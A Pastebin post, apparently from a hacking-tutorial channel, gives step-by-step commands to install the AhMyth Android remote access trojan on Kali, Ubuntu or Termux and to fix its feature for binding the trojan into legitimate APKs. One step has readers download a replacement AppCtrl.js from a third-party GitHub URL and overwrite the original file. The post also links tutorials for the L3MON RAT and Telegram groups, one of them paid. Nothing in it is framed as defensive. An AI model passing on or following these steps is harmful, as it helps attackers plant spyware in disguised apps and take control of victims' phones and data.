Advertisement
efxtv

How to install and fix AhMyth unable To Bind apk

Sep 7th, 2022
185
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.15 KB | None | 0 0
  1. How to install Ahmyth in Kali/Parrot/Ubuntu/Termux ?
  2.  
  3. # Prerequisites
  4. sudo apt-get update;sudo apt-get upgrade
  5. sudo apt install wget curl git npm nano nodejs openjdk-8-jdk openjdk-8-jre
  6. sudo npm install pm2 -g
  7.  
  8. Java 8 in Kali Linux/Windows/Ubuntu
  9. https://youtube.com/playlist?list=PLI4Vi9cCSEQlSUEFU3eiahIFpYfw3nq0m
  10. How to install root in Termux, without having actual root
  11. https://youtube.com/playlist?list=PLI4Vi9cCSEQkuNBwBcSPxDEEkMZ25X8n9
  12.  
  13. How to install L3MON RAT in Termux/Kali Linux
  14. https://youtube.com/playlist?list=PLI4Vi9cCSEQkpGsWCx23ieY32ENrTTUnJ
  15.  
  16.  
  17. 1. Install AhMyth
  18. git clone https://github.com/AhMyth/AhMyth-Android-RAT.git
  19. cd AhMyth-Android-RAT/AhMyth-Server
  20. npm install
  21. npm audit fix
  22. npm fix
  23. npm start
  24.  
  25. 2. Unable to bind APK in AhMyth?
  26. Copy the file in Given directory
  27. Download the file AppCtrl.js [ https://raw.githubusercontent.com/efxtv/EFX-Tv-Bookmarks/main/bin/AppCtrl.js ]
  28. Delete previous file AppCtrl.js
  29. Copy downloaded file in 👇️
  30. /home/kali/AhMyth-Android-RAT/AhMyth-Server/app/app/assets/js/controllers
  31.  
  32. Happy Binding
  33.  
  34. # Join our telegram group
  35. t.me/efxtv
  36.  
  37. Our Paid user Group
  38. https://t.me/+EUnfbhWXqjszNTc9
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement